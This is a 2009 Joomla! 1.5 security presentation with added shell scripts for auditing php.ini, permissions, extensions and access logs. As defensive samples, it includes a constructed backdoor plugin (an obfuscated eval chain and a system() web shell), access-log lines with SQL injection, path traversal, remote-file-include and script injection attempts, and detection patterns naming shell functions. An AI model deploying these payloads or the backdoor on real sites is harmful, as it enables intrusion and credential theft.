joomladay netherlands - security
Joomla! 1.5 Security
Joomla!day Presentation
Utrecht, Netherlands
12 June 2009
Is Joomla! safe?
Is the World Wide Web Safe?
You know, I don't mean any disrespect, but I had to chuckle at the question "Is Joomla! not safe?", since it reminded me of the movie The Marathon Man, when the dentist is pulling Dustin Hoffman's teeth out, asking "Is it safe?", and he's so desperate to get the dentist to stop that he says "Yes" or "No" or "What do you want to hear?"
Is Joomla! safe?
Quote taken from: http://forum.joomla.org/viewtopic.php?f=432&t=318351&st=0&sk=t&sd=a
I would say: anyone who tells a community that a web site or an out-of-the-box solution is safe is not being responsible. No, it is not "safe" on the Internet.
What is this presentation about?
Presentation overview

- Getting started
- Hosting and server setup
- Joomla! setup
- Site administration
- Site recovery
Getting started

Some basic things before we go into details:
- Report a (possible) hack to the Joomla! Security Strike Team (JSST): http://developer.joomla.org/security/contact-the-team.html
- Please don't report hacks or proof-of-concepts out in the open; report them to the JSST as well.
- Stay informed!
  - Automatic e-mail notification: http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews
  - RSS feed: http://feeds.joomla.org/JoomlaSecurityNews
Hosting and server setup

Shared hosting or dedicated hosting?
Two php.ini directives to check first: “register_globals” and “open_basedir”
Configure Apache:
- Secure important areas with .htaccess
- Use mod_rewrite and mod_security to block PHP attacks

Configure MySQL:
- Implement user accounts on the “need-to-know” principle

Configure PHP:
- Use PHP 5!
- Configure your php.ini file properly (most of the time this is limited on shared hosts)
Configure php.ini:
- Use “disable_functions” to disable dangerous PHP functions that are not needed by your site.
- Use “open_basedir”.
- Don't use “safe_mode” (it gives a false sense of security).
- Don't use “register_globals”.
- Don't use “allow_url_fopen”. This option enables the URL-aware fopen wrappers, which let URLs be opened like local files.
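An added example (not from the presentation and not Joomla! project code) that turns the PHP points of the two configuration slides above into a check: a small POSIX shell audit of a php.ini that flags register_globals, allow_url_fopen and safe_mode when enabled, a missing open_basedir, and shell-spawning functions absent from disable_functions. The two php.ini files it writes are constructed samples; the open_basedir path and the list of functions are assumptions for illustration, not values the slides prescribe.

```shell
#!/bin/sh
# Added example: audit a php.ini against the settings on the slides above.
# Not part of the presentation; the two php.ini files written below are
# constructed samples, and the paths and function list are assumptions.

# ini_value FILE KEY
# Prints the effective value of KEY the way PHP resolves it: "; comments"
# dropped, surrounding double quotes removed, last assignment wins.
# Prints nothing when KEY is not set at all.
ini_value() {
    sed -n -e 's/;.*$//' -e 's/[[:space:]]*$//' \
        -e "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*//p" "$1" \
      | sed -e 's/^"\(.*\)"$/\1/' | tail -n 1
}

# is_on VALUE: succeeds when PHP treats VALUE as boolean true.
is_on() {
    case "$(printf '%s' "$1" | tr 'A-Z' 'a-z')" in
        on|1|true|yes) return 0 ;;
        *)             return 1 ;;
    esac
}

# audit_php_ini FILE
# Prints one line per finding and returns the number of findings, so an
# exit status of 0 means the file passes every check from the slides.
audit_php_ini() {
    audit_ini=$1
    audit_count=0
    if is_on "$(ini_value "$audit_ini" register_globals)"; then
        echo "register_globals is On: request parameters become PHP globals; set it Off"
        audit_count=$((audit_count + 1))
    fi
    if is_on "$(ini_value "$audit_ini" allow_url_fopen)"; then
        echo "allow_url_fopen is On: include/fopen can fetch remote URLs; set it Off"
        audit_count=$((audit_count + 1))
    fi
    if is_on "$(ini_value "$audit_ini" safe_mode)"; then
        echo "safe_mode is On: a false sense of security; use open_basedir and file permissions instead"
        audit_count=$((audit_count + 1))
    fi
    if [ -z "$(ini_value "$audit_ini" open_basedir)" ]; then
        echo "open_basedir is unset: PHP may open any file the web server user can read; restrict it to the site's directories"
        audit_count=$((audit_count + 1))
    fi
    # Functions that hand a shell to whoever gets a PHP file onto the host.
    # The list is an assumption for this example; extend it to whatever your
    # site does not need.
    audit_disabled=",$(ini_value "$audit_ini" disable_functions | tr -d ' '),"
    for fn in exec passthru shell_exec system proc_open popen; do
        case "$audit_disabled" in
            *",$fn,"*) ;;
            *) echo "disable_functions does not list $fn"
               audit_count=$((audit_count + 1)) ;;
        esac
    done
    return "$audit_count"
}

# Constructed samples: the permissive settings of the period, and a hardened file.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
WEAK_INI="$WORK/php.ini.weak"
HARD_INI="$WORK/php.ini.hardened"
cat > "$WEAK_INI" <<'EOF'
; constructed sample, not taken from a real server
register_globals = On
allow_url_fopen = On
safe_mode = On
; open_basedir deliberately left unset
disable_functions =
EOF
cat > "$HARD_INI" <<'EOF'
; constructed sample; the path is an assumption for this example
register_globals = Off
allow_url_fopen = Off
safe_mode = Off
open_basedir = "/var/www/site:/tmp"
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
EOF

for ini in "$WEAK_INI" "$HARD_INI"; do
    echo "== $ini"
    audit_php_ini "$ini"
    echo "findings: $?"
done
```

On a shared host you usually cannot edit the server's php.ini; run the audit against the output of `php -i` or the per-directory php.ini your host allows, and treat anything you cannot change as a reason to pick a different host.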
Joomla! setup
Some basic rules to think about:
- Only install official Joomla! versions!
- Change the default administrator username
- Protect directories and files
- Move crucial files outside the public directory: http://docs.joomla.org/Security_and_Performance_FAQs#How_do_I_move_confidential_files_outside_of_public_html.3F
- Ensure that all configurable paths to writable or uploadable directories
- Protect your log directory (move it out of the document root or protect it with .htaccess)
- Adjust file and directory permissions: set critical directories to 755 and files to 644
- Remove unneeded files
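An added example, not from the presentation or the Joomla! project, of the permission and directory rules on this slide as a POSIX shell check: it lists every directory that is not 755 and every file that is not 644, everything world-writable, and the run-time writable directories inside the document root that have no .htaccess, then applies 755/644. The site tree it builds is a constructed sample; the list of writable directories (cache, images, logs, tmp) and the use of a .htaccess file as the marker of a protected directory are assumptions for this example.

```shell
#!/bin/sh
# Added example: check and apply the 755/644 rule from the slide, and spot the
# writable directories that must be moved out of the document root or
# .htaccess-protected. Not part of the presentation; the site tree built
# below is a constructed sample.

# perm_deviations ROOT: "dir <path>" / "file <path>" for every entry whose
# mode is not exactly 755 (directories) or 644 (files).
perm_deviations() {
    find "$1" -type d ! -perm 755 | sed 's/^/dir  /'
    find "$1" -type f ! -perm 644 | sed 's/^/file /'
}

# perm_deviation_count ROOT: how many entries perm_deviations lists.
perm_deviation_count() {
    perm_deviations "$1" | wc -l | tr -d ' '
}

# world_writable ROOT: files and directories any local account can write to,
# which on a shared host means every other customer's scripts.
world_writable() {
    find "$1" \( -type d -o -type f \) -perm -002
}

# unprotected_writable_dirs ROOT: directories Joomla! 1.5 writes to at run
# time (assumed list) that sit inside the document root without a .htaccess
# of their own. The slide's advice for the log directory applies to each.
unprotected_writable_dirs() {
    for sub in cache images logs tmp; do
        [ -d "$1/$sub" ] || continue
        [ -f "$1/$sub/.htaccess" ] || echo "$1/$sub"
    done
}

# perm_fix ROOT: apply the slide's rule: directories 755, files 644.
perm_fix() {
    find "$1" -type d ! -perm 755 -exec chmod 755 {} +
    find "$1" -type f ! -perm 644 -exec chmod 644 {} +
}

# make_sample_site DIR: constructed Joomla!-like tree with the usual mistakes:
# upload directories opened to 777 "so uploads work", configuration.php
# readable and writable by everyone, an executable bit on a PHP file, and
# writable directories that have no .htaccess.
make_sample_site() {
    mkdir -p "$1/administrator" "$1/images/stories" "$1/logs" "$1/tmp" "$1/cache"
    : > "$1/configuration.php"
    : > "$1/index.php"
    : > "$1/images/stories/banner.jpg"
    : > "$1/logs/error.php"
    : > "$1/cache/.htaccess"
    chmod 755 "$1" "$1/administrator" "$1/images" "$1/logs" "$1/cache"
    chmod 644 "$1/images/stories/banner.jpg" "$1/logs/error.php" "$1/cache/.htaccess"
    chmod 777 "$1/images/stories" "$1/tmp"
    chmod 666 "$1/configuration.php"
    chmod 755 "$1/index.php"
}

SITE=$(mktemp -d)
trap 'rm -rf "$SITE"' EXIT
make_sample_site "$SITE"
echo "== before: $(perm_deviation_count "$SITE") entries off 755/644"
perm_deviations "$SITE"
echo "== world-writable"
world_writable "$SITE"
echo "== writable directories in the document root without .htaccess"
unprotected_writable_dirs "$SITE"
perm_fix "$SITE"
echo "== after perm_fix: $(perm_deviation_count "$SITE") entries off 755/644"
```

Run the report before the fix on a real site: a directory that legitimately needs group write access (some hosts run PHP as a separate user) will show up, and you want to know about it rather than silently chmod it into a broken upload form.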
Before you install extensions:
- Always back up (even on your test system)
- Always test before you install on your live server
- Check for extension vulnerabilities
- Download from trusted sites
- User beware! Check the code quality
- Test! Test! Test!
- Remove junk files (everything that is not needed)
- Avoid encrypted code
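An added example (not from the presentation, not Joomla! code) of the "check the code quality", "remove junk files" and "avoid encrypted code" points as a POSIX shell pre-install review of an unpacked extension: it greps the PHP files for the eval/base64_decode/gzinflate style of hidden code and for shell-spawning calls, and lists leftover editor backups and archives. The two sample plugins are constructed; their file names and the pattern list are assumptions for illustration.

```shell
#!/bin/sh
# Added example: review an unpacked extension before installing it, covering
# the "check the code quality", "remove junk files" and "avoid encrypted code"
# points. Not part of the presentation; the two plugins written below are
# constructed samples and the pattern list is an assumption.

# Calls that ordinary extension code rarely needs but hidden ("encrypted")
# payloads and backdoors almost always use. Extend the list to taste.
SUSPICIOUS_CALLS='(eval|assert|create_function|base64_decode|gzinflate|gzuncompress|str_rot13|system|exec|shell_exec|passthru|popen|proc_open)[[:space:]]*\('

# scan_obfuscation DIR: file:line:text for every PHP line that uses one of the
# calls above. Read each hit; a decoder chained into eval is a stop sign.
scan_obfuscation() {
    find "$1" -type f \( -name '*.php' -o -name '*.inc' \) \
        -exec grep -E -n -H "$SUSPICIOUS_CALLS" {} +
}

# junk_files DIR: editor backups, archives and OS droppings that have no
# business on a live server.
junk_files() {
    find "$1" -type f \( -name '*~' -o -name '*.bak' -o -name '*.orig' -o -name '*.swp' \
        -o -name '*.zip' -o -name '*.tar.gz' -o -name 'Thumbs.db' -o -name '.DS_Store' \)
}

# review_extension DIR: prints both reports; exit status 0 only if both are empty.
review_extension() {
    review_hits=$(scan_obfuscation "$1" || true)
    review_junk=$(junk_files "$1" || true)
    [ -n "$review_hits" ] && { echo "== suspicious calls"; echo "$review_hits"; }
    [ -n "$review_junk" ] && { echo "== junk files"; echo "$review_junk"; }
    [ -z "$review_hits" ] && [ -z "$review_junk" ]
}

# Constructed samples: one ordinary plugin, one carrying the shapes to refuse.
EXT=$(mktemp -d)
trap 'rm -rf "$EXT"' EXIT
mkdir -p "$EXT/plg_clean" "$EXT/plg_shady"
cat > "$EXT/plg_clean/clean.php" <<'EOF'
<?php
// constructed sample of ordinary Joomla! 1.5 plugin code
defined('_JEXEC') or die('Restricted access');
class plgSystemClean extends JPlugin {
    function onAfterRoute() {
        $id = JRequest::getInt('id', 0);
        return $id > 0;
    }
}
EOF
cat > "$EXT/plg_shady/shady.php" <<'EOF'
<?php
// constructed sample of the "encrypted code" the slide warns about:
// a decoder chain feeding eval, and a request parameter passed straight to system
defined('_JEXEC') or die('Restricted access');
eval(gzinflate(base64_decode('ZWNobyAxOw==')));
if (isset($_REQUEST['c'])) { system($_REQUEST['c']); }
EOF
: > "$EXT/plg_shady/README.txt~"
: > "$EXT/plg_shady/install.sql.bak"

review_extension "$EXT"
echo "review exit status: $?"
```

A hit is a prompt to read the code, not a verdict: a legitimate extension may call base64_decode on image data, but it has no reason to feed the result to eval, and an author who ships only obfuscated code has removed your ability to check anything at all.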
Site administration

- Use well-formed passwords
- Maintain a strong site backup process
- Monitor crack attempts (Tripwire, Samhain)
- Perform manual intrusion detection (manual logfile scan)
- Stay current with security patches and upgrades
Site recovery

- Get help the right way
- Follow a logical and rigorous recovery process
- Reset your administrator password (and those of all admins/super admins)
- Find exploit attempts using the *NIX shell
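The "manual logfile scan" on the site administration slide and "find exploit attempts using the *NIX shell" here are the same job. As an added example (not the presenter's or Joomla!'s code), the POSIX shell functions below grep an Apache access log for the request shapes worth a second look (SQL keywords, ../ traversal, a URL passed as a parameter value, script tags) and rank the client addresses behind them. The log lines are constructed: the addresses come from the RFC 5737 documentation ranges and the component and parameter names are made up; the patterns are generic attack grammar, not a list of known Joomla! bugs.

```shell
#!/bin/sh
# Added example: find exploit attempts in an Apache access log from the shell.
# Not part of the presentation; the log written below is a constructed sample
# and the pattern list is an assumption to extend for your own site.

# Request shapes worth a second look, matched case-insensitively against the
# raw log line so URL-encoded variants (%20, %2e, %3c) are caught as well.
ATTACK_PATTERNS='\.\./|%2e%2e(%2f|/)|union(%20|\+| )+(all(%20|\+| )+)?select|=(https?|ftp)(:|%3a)(//|%2f%2f)|(%3c|<)script|base64_decode|eval\(|php://input'

# exploit_attempts LOG: every log line matching ATTACK_PATTERNS.
exploit_attempts() {
    grep -E -i "$ATTACK_PATTERNS" "$1"
}

# attackers_by_count LOG: "<hits> <client IP>" per matching client, busiest first.
attackers_by_count() {
    exploit_attempts "$1" | awk '{ print $1 }' | sort | uniq -c | sort -rn \
        | awk '{ print $1, $2 }'
}

# requests_from LOG IP: method and path of every request one address made,
# for the "what else did they touch?" step of a recovery.
requests_from() {
    awk -v ip="$2" '$1 == ip { print $6, $7 }' "$1" | tr -d '"'
}

# Constructed sample log (RFC 5737 addresses, made-up component names).
LOG=$(mktemp)
trap 'rm -f "$LOG"' EXIT
cat > "$LOG" <<'EOF'
203.0.113.5 - - [12/Jun/2009:10:15:01 +0200] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5120 "http://www.example.com/" "Mozilla/5.0"
198.51.100.23 - - [12/Jun/2009:10:15:07 +0200] "GET /index.php?option=com_y&id=12%20UNION%20SELECT%201,2,username,password%20FROM%20jos_users HTTP/1.1" 200 812 "-" "-"
198.51.100.23 - - [12/Jun/2009:10:15:09 +0200] "GET /index.php?option=com_y&controller=../../../../etc/passwd%00 HTTP/1.1" 200 2048 "-" "-"
192.0.2.77 - - [12/Jun/2009:10:16:41 +0200] "GET /index.php?option=com_x&file=http://203.0.113.99/x.txt? HTTP/1.1" 200 120 "-" "libwww-perl/5.805"
203.0.113.5 - - [12/Jun/2009:10:17:02 +0200] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"
192.0.2.77 - - [12/Jun/2009:10:17:30 +0200] "GET /index.php?option=com_z&searchword=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4000 "-" "-"
EOF

echo "== suspicious requests"
exploit_attempts "$LOG"
echo "== by client"
attackers_by_count "$LOG"
echo "== everything 192.0.2.77 requested"
requests_from "$LOG" 192.0.2.77
```

A status of 200 next to one of these requests is what deserves attention: a 404 means the target did not exist, a 200 on a traversal or remote-include attempt means the server answered, and that request is where the recovery timeline starts.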
Links
- Documentation wiki: http://docs.joomla.org/Category:Security_Checklist
- Joomla! Security Strike Team (JSST): http://developer.joomla.org/security.html
- Report issues to the JSST: http://developer.joomla.org/security/contact-the-team.html
Sites to monitor when you take security seriously

Joomla! related:
- www.joomla.org
- developer.joomla.org/security.html
- www.secunia.org
- www.milw0rm.com

Sites to put RSS feeds on:
- http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews

General:
- www.us-cert.gov
- www.frsirt.com

Operating systems related:
- www.debian.org/security
- www.openbsd.org/security
- www.redhat.org/apps/support
Questions?